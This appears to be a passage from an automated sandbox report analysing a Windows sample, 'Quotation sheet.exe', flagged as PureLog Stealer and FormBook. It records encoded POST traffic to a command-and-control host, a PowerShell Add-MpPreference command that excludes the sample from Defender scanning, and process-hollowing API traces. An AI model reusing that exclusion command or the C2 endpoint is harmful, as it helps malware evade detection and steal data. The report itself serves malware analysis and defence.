                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.ampsamkok88.shop
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 209
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.ampsamkok88.shop/huvt/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Ascii: 4nJt=/z/07yxfDjX26e8ie9SvpT+r8joks215P61WbgN4tT6czc1jGRP9ma5KnJK6d8DQSxQCdWR9hwfZcY198eNuZFjRROls5bJIq/AswIqFleWqL45cV+3wQNOWu3ki1csvkYqsLSGTdN7HYOVVXPxroF4fPQyl17FOne+5CSnAL6FFXF0FEkQUx/C6gRvNYcQV9gvlZsMsdPlM
                                                                                                                      Nov 26, 2024 11:19:27.515847921 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Tue, 26 Nov 2024 10:19:27 GMT
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=61h0aBsMpLZYAVuIixgC6c2tasiU6xi%2BvgtBLdr6%2B%2BUusJuRQKeXdLuLTrP%2BzkYL165pdaj7bPLj9vQy6NCSU4qWbg94PaboI9o5XhoJwzMHxE2KxPPndSgzni2i2I%2B1JNfN%2FML3lA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e8923e769fa41a6-EWR
                                                                                                                      Content-Encoding: gzip
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=6155&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=621&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                      Nov 26, 2024 11:19:27.516012907 CET | 276 | IN


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      30 | 192.168.2.6 | 50019 | 172.67.209.48 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Nov 26, 2024 11:19:29.009712934 CET | 645 | OUT | POST /huvt/ HTTP/1.1
                                                                                                                      Host: www.ampsamkok88.shop
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.ampsamkok88.shop
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 233
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.ampsamkok88.shop/huvt/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Ascii: 4nJt=/z/07yxfDjX24+MiS6+v4D+sgTok3G0+P6pWbkUntlicy9FjHTr92K5Ky5K7TcDbSxc8dX99hwLZcdJ97vNpYVjTdulukLJIq/AswIurleOqLLxcWf3zTNOVp3ki/8srkYqCLTb8dODHYOlVXbtsjF4jLQzAw4sXhty/BVfHYt55bTpfYXQ3jvi4gT3/Y8Q//gXlL7ALS7Av9CHBEyQ9zuWLX/haz5uduA==
                                                                                                                      Nov 26, 2024 11:19:30.261264086 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Tue, 26 Nov 2024 10:19:30 GMT
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hNEGVMKrSuD3fie%2FWG29BZDGVkstMMYqum5eXlzYxUazZO6cIEmE6wtQExqAoOsxJ1%2B068vXVKQ4bj6vH5hMbf6Z29ozvIFtZj%2Bc0Umm00BC%2BZsu7vZDqv%2B0D%2Bq%2BfCjdLW2OOVi3FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e8923f88ce5c35b-EWR
                                                                                                                      Content-Encoding: gzip
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1463&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=645&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                      Nov 26, 2024 11:19:30.261507034 CET | 272 | IN


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      31 | 192.168.2.6 | 50020 | 172.67.209.48 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Nov 26, 2024 11:19:31.674840927 CET | 1658 | OUT | POST /huvt/ HTTP/1.1
                                                                                                                      Host: www.ampsamkok88.shop
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.ampsamkok88.shop
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 1245
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.ampsamkok88.shop/huvt/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Nov 26, 2024 11:19:32.899388075 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Tue, 26 Nov 2024 10:19:32 GMT
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bNR13V4sLxlgAsW4Ga94sQ9gboILyfdeBIavtEmj3d7iZAdtW6u%2Fiay6xavXVPQ4csbmA6VHFXSPBnrqACkHL6yJR7VvJwMIWNiwYz4Pe7hz6psM1gi%2FjNtDJ9rLOVm3dNqWhf%2FstA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e892408f95f8cc0-EWR
                                                                                                                      Content-Encoding: gzip
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1897&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1658&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                      Nov 26, 2024 11:19:32.899518013 CET | 265 | IN


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      32 | 192.168.2.6 | 50021 | 172.67.209.48 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Nov 26, 2024 11:19:34.332317114 CET | 365 | OUT | GET /huvt/?pXIDi=30N834GpBZU0OT&4nJt=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPYmXYZehu45VPp8MOy5WAu5nHK8ZcCMaFZ8i121M6teoDlc6/N3I= HTTP/1.1
                                                                                                                      Host: www.ampsamkok88.shop
                                                                                                                      Accept: */*
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Timestamp: Nov 26, 2024 11:19:35.497819901 CET
Bytes transferred: 1236
Direction: IN
Data:
HTTP/1.1 404 Not Found
                                                                                                                      Date: Tue, 26 Nov 2024 10:19:35 GMT
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2alaFL6cxn9%2FkQLp6qGrmekdiGbdymeMHa10MsqovVrLhl%2FGz7ACuOGXYlXRBaaNCZczSM8YEhsrxuGGtFrkxhe%2FJWyb7fR0Ni0br0YaJ1%2FI%2Bdv3zw3ifPwMZFh4AGRgPt31HEsDZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e8924195f8442b8-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1587&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=365&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                      Data Ascii: 4e5<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$param
Timestamp: Nov 26, 2024 11:19:35.498091936 CET
Bytes transferred: 806
Direction: IN
                                                                                                                      Data Ascii: s={r:'8e8924195f8442b8',t:'MTczMjYxNjM3NS4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('h



                                                                                                                      Target ID:0
                                                                                                                      Start time:05:16:31
                                                                                                                      Start date:26/11/2024
                                                                                                                      Path:C:\Users\user\Desktop\Quotation sheet.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\Quotation sheet.exe"
                                                                                                                      Imagebase:0xf90000
                                                                                                                      File size:795'136 bytes
                                                                                                                      MD5 hash:44AE4C9C2AB6623C0C1D04BB8B81871E
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2354177736.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2346401680.0000000004379000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:4
                                                                                                                      Start time:05:16:52
                                                                                                                      Start date:26/11/2024
                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation sheet.exe"
                                                                                                                      Imagebase:0xe00000
                                                                                                                      File size:433'152 bytes
                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:5
                                                                                                                      Start time:05:16:52
                                                                                                                      Start date:26/11/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:6
                                                                                                                      Start time:05:16:52
                                                                                                                      Start date:26/11/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                                                      Imagebase:0xbf0000
                                                                                                                      File size:2'625'616 bytes
                                                                                                                      MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:true

                                                                                                                      Target ID:7
                                                                                                                      Start time:05:16:52
                                                                                                                      Start date:26/11/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                                                      Imagebase:0xbf0000
                                                                                                                      File size:2'625'616 bytes
                                                                                                                      MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2440846856.0000000005250000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2448995977.0000000006B70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:true

                                                                                                                      Target ID:8
                                                                                                                      Start time:05:16:55
                                                                                                                      Start date:26/11/2024
                                                                                                                      Path:C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe"
                                                                                                                      Imagebase:0x910000
                                                                                                                      File size:140'800 bytes
                                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3973027179.0000000004530000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      Target ID:9
                                                                                                                      Start time:05:16:57
                                                                                                                      Start date:26/11/2024
                                                                                                                      Path:C:\Windows\SysWOW64\pcaui.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\SysWOW64\pcaui.exe"
                                                                                                                      Imagebase:0x4f0000
                                                                                                                      File size:135'680 bytes
                                                                                                                      MD5 hash:A8F63C86DEF45A7E48E7F7DF158CFAA9
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3973205147.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3973266974.0000000004F10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      Target ID:11
                                                                                                                      Start time:05:17:11
                                                                                                                      Start date:26/11/2024
                                                                                                                      Path:C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe"
                                                                                                                      Imagebase:0x910000
                                                                                                                      File size:140'800 bytes
                                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3973090704.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      Target ID:13
                                                                                                                      Start time:05:17:24
                                                                                                                      Start date:26/11/2024
                                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                      Imagebase:0x7ff728280000
                                                                                                                      File size:676'768 bytes
                                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true


                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:13.3%
                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                        Signature Coverage:0%
                                                                                                                        Total number of Nodes:268
                                                                                                                        Total number of Limit Nodes:12
78c7f5e 32598->32671 32675 78c7f37 32598->32675 32599 78cb21a 32599->32531 32679 78c7fd8 32602->32679 32683 78c7fe0 32602->32683 32603 78cb5cc 32603->32602 32607 78cb371 32606->32607 32608 78cb21a 32606->32608 32609 78c7f5e ResumeThread 32607->32609 32610 78c7f37 ResumeThread 32607->32610 32608->32531 32609->32608 32610->32608 32612 78cb6cc 32611->32612 32687 78c85a8 32612->32687 32691 78c85b0 32612->32691 32613 78cbb43 32617 78cb5cc 32616->32617 32618 78c7fd8 Wow64SetThreadContext 32617->32618 32619 78c7fe0 Wow64SetThreadContext 32617->32619 32618->32617 32619->32617 32622 78c85a8 WriteProcessMemory 32620->32622 32623 78c85b0 WriteProcessMemory 32620->32623 32621 78cb2b3 32621->32531 32622->32621 32623->32621 32626 78c7fd8 Wow64SetThreadContext 32624->32626 32627 78c7fe0 Wow64SetThreadContext 32624->32627 32625 78cb4fe 32626->32625 32627->32625 32629 78cb33b 32628->32629 32630 78c84e8 VirtualAllocEx 32629->32630 32631 78c84f0 VirtualAllocEx 32629->32631 32630->32629 32631->32629 32633 78cb4d7 32632->32633 32635 78c85a8 WriteProcessMemory 32633->32635 32636 78c85b0 WriteProcessMemory 32633->32636 32634 78cb631 32635->32634 32636->32634 32638 78cb481 32637->32638 32639 78c84e8 VirtualAllocEx 32638->32639 32640 78c84f0 VirtualAllocEx 32638->32640 32639->32638 32640->32638 32643 78cb3eb 32641->32643 32642 78cb885 32642->32531 32643->32642 32644 78c8698 ReadProcessMemory 32643->32644 32645 78c86a0 ReadProcessMemory 32643->32645 32644->32643 32645->32643 32647 78c88c1 CreateProcessA 32646->32647 32649 78c8a83 32647->32649 32651 78c88c1 CreateProcessA 32650->32651 32653 78c8a83 32651->32653 32655 78c84eb VirtualAllocEx 32654->32655 32656 78c8495 32654->32656 32658 78c856d 32655->32658 32656->32589 32658->32589 32660 78c8530 VirtualAllocEx 32659->32660 32662 78c856d 32660->32662 32662->32589 32664 78c86eb ReadProcessMemory 32663->32664 32666 78c872f 32664->32666 32666->32593 32668 78c86eb ReadProcessMemory 32667->32668 32670 78c872f 32668->32670 32670->32593 32672 78c7f70 
ResumeThread 32671->32672 32674 78c7fa1 32672->32674 32674->32599 32676 78c7f5e ResumeThread 32675->32676 32678 78c7fa1 32676->32678 32678->32599 32680 78c7fe0 Wow64SetThreadContext 32679->32680 32682 78c806d 32680->32682 32682->32603 32684 78c8025 Wow64SetThreadContext 32683->32684 32686 78c806d 32684->32686 32686->32603 32688 78c85b0 WriteProcessMemory 32687->32688 32690 78c864f 32688->32690 32690->32613 32692 78c85f8 WriteProcessMemory 32691->32692 32694 78c864f 32692->32694 32694->32613 32750 59d51b8 32752 59d51e6 32750->32752 32751 59d5271 32752->32751 32754 59d4e78 32752->32754 32756 59d4e83 32754->32756 32755 59d5378 32755->32751 32756->32755 32758 59d4ea8 32756->32758 32759 59d54c0 SetTimer 32758->32759 32760 59d552c 32759->32760 32760->32755 32768 59db968 32772 59db990 32768->32772 32776 59db9a0 32768->32776 32769 59db987 32773 59db9a6 32772->32773 32780 59db9d9 32773->32780 32774 59db9ce 32774->32769 32777 59db9a9 32776->32777 32779 59db9d9 DrawTextExW 32777->32779 32778 59db9ce 32778->32769 32779->32778 32781 59dba12 32780->32781 32782 59dba23 32780->32782 32781->32774 32783 59dbab1 32782->32783 32786 59dbd10 32782->32786 32791 59dbd00 32782->32791 32783->32774 32788 59dbd38 32786->32788 32787 59dbe3e 32787->32781 32788->32787 32796 59dc598 32788->32796 32801 59dc5a8 32788->32801 32792 59dbd38 32791->32792 32793 59dbe3e 32792->32793 32794 59dc598 DrawTextExW 32792->32794 32795 59dc5a8 DrawTextExW 32792->32795 32793->32781 32794->32793 32795->32793 32797 59dc5a8 32796->32797 32799 59dca10 DrawTextExW 32797->32799 32806 59dca00 32797->32806 32798 59dc634 32798->32787 32799->32798 32802 59dc5be 32801->32802 32804 59dca10 DrawTextExW 32802->32804 32805 59dca00 DrawTextExW 32802->32805 32803 59dc634 32803->32787 32804->32803 32805->32803 32807 59dca10 32806->32807 32809 59dca50 DrawTextExW 32807->32809 32810 59dca40 DrawTextExW 32807->32810 32808 59dca2e 32808->32798 32809->32808 32810->32808 32695 59d5440 32696 59d544d 32695->32696 32697 59d5468 32695->32697 
32697->32696 32700 59d4eb4 32697->32700 32699 59d5479 32701 59d4ebf 32700->32701 32704 59d4ef4 32701->32704 32703 59d5795 32703->32699 32705 59d4eff 32704->32705 32706 59d5901 GetCurrentThreadId 32705->32706 32707 59d592b 32705->32707 32706->32707 32707->32703 32811 59d5560 32814 59d558d 32811->32814 32812 59d55dc 32812->32812 32814->32812 32815 59d4ed4 32814->32815 32816 59d4edf 32815->32816 32817 59d4eb4 GetCurrentThreadId 32816->32817 32818 59d573c 32817->32818 32819 59d4e78 SetTimer 32818->32819 32820 59d5745 32819->32820 32820->32812 32708 78c5453 32709 78c546c 32708->32709 32720 78c7b2f 32709->32720 32724 78c7b40 32709->32724 32728 78c78d1 32709->32728 32732 78c78e0 32709->32732 32710 78c541a 32715 78c7b2f ResumeThread 32710->32715 32716 78c55cb 32710->32716 32717 78c7b40 ResumeThread 32710->32717 32718 78c78e0 ResumeThread 32710->32718 32719 78c78d1 ResumeThread 32710->32719 32715->32716 32717->32716 32718->32716 32719->32716 32721 78c7b73 32720->32721 32722 78c7be1 32721->32722 32736 78c7ecb 32721->32736 32722->32710 32725 78c7b73 32724->32725 32726 78c7be1 32725->32726 32727 78c7ecb ResumeThread 32725->32727 32726->32710 32727->32726 32730 78c78e0 32728->32730 32729 78c798e 32729->32710 32730->32729 32731 78c7ecb ResumeThread 32730->32731 32731->32729 32733 78c78f8 32732->32733 32734 78c798e 32733->32734 32735 78c7ecb ResumeThread 32733->32735 32734->32710 32735->32734 32737 78c7f43 32736->32737 32738 78c7ed2 32736->32738 32737->32738 32739 78c7f5e ResumeThread 32737->32739 32738->32722 32761 78c55e3 32762 78c5420 32761->32762 32763 78c55cb 32762->32763 32764 78c7b2f ResumeThread 32762->32764 32765 78c7b40 ResumeThread 32762->32765 32766 78c78e0 ResumeThread 32762->32766 32767 78c78d1 ResumeThread 32762->32767 32764->32763 32765->32763 32766->32763 32767->32763

Control-flow Graph (first node 94dac70-94dac91; legend: Executed / Not Executed)
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: <ov!
                                                                                                                        • API String ID: 0-3980319286
                                                                                                                        • Opcode ID: c6fb7eec4dde91fcf2ce39959acdb636351ef7b36d2882f13aedfba366e8712c
                                                                                                                        • Instruction ID: 644ce23107ae4f5b4e35240bf321892a74614d1fbe89b6e0b6fcf25f30fd25d7
                                                                                                                        • Opcode Fuzzy Hash: c6fb7eec4dde91fcf2ce39959acdb636351ef7b36d2882f13aedfba366e8712c
                                                                                                                        • Instruction Fuzzy Hash: 20B2D074E01228CFDB64CF69C994AD9BBB2FF89304F1581E9D509AB225DB319E81CF40

Control-flow Graph (first node 94d975e-94d9762; legend: Executed / Not Executed)
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 0-2746444292
                                                                                                                        • Opcode ID: c79d20b9b866bcf72b36eac41f4d622a067ef1143a49b67d22f8458e7d7880ba
                                                                                                                        • Instruction ID: 4242a1f3344540ea59a03609a944b93ecde0fa63dc817ac111e6b70f2b014c0a
                                                                                                                        • Opcode Fuzzy Hash: c79d20b9b866bcf72b36eac41f4d622a067ef1143a49b67d22f8458e7d7880ba
                                                                                                                        • Instruction Fuzzy Hash: 5F528674A112198FDB64DF64C998B9DBBB2FF89300F1081E9D509AB765CB349E81CF90
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2352504395.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_59d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: {
                                                                                                                        • API String ID: 0-366298937
                                                                                                                        • Opcode ID: 3f28e4005619979f8022235f55ef8445e472c1229558b39eec7e38816281ed32
                                                                                                                        • Instruction ID: e423cd1a4c0cb940bfe1be21494b197a1333573a5c54331d2f688ff5d88d1181
                                                                                                                        • Opcode Fuzzy Hash: 3f28e4005619979f8022235f55ef8445e472c1229558b39eec7e38816281ed32
                                                                                                                        • Instruction Fuzzy Hash: 6A810274E04249CFDB04CFA9D484AEEFBF2BF89300F14C52AD419AB255D7749A46CB60
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 39cb7f3de076ac8e132482211392e190accf4d3e3ad69ede2f69a5433a71b18b
                                                                                                                        • Instruction ID: ad869322186cf1f6366077e9bc8140a70f79e716667f5fe681a2ad8ec4b0c9bc
                                                                                                                        • Opcode Fuzzy Hash: 39cb7f3de076ac8e132482211392e190accf4d3e3ad69ede2f69a5433a71b18b
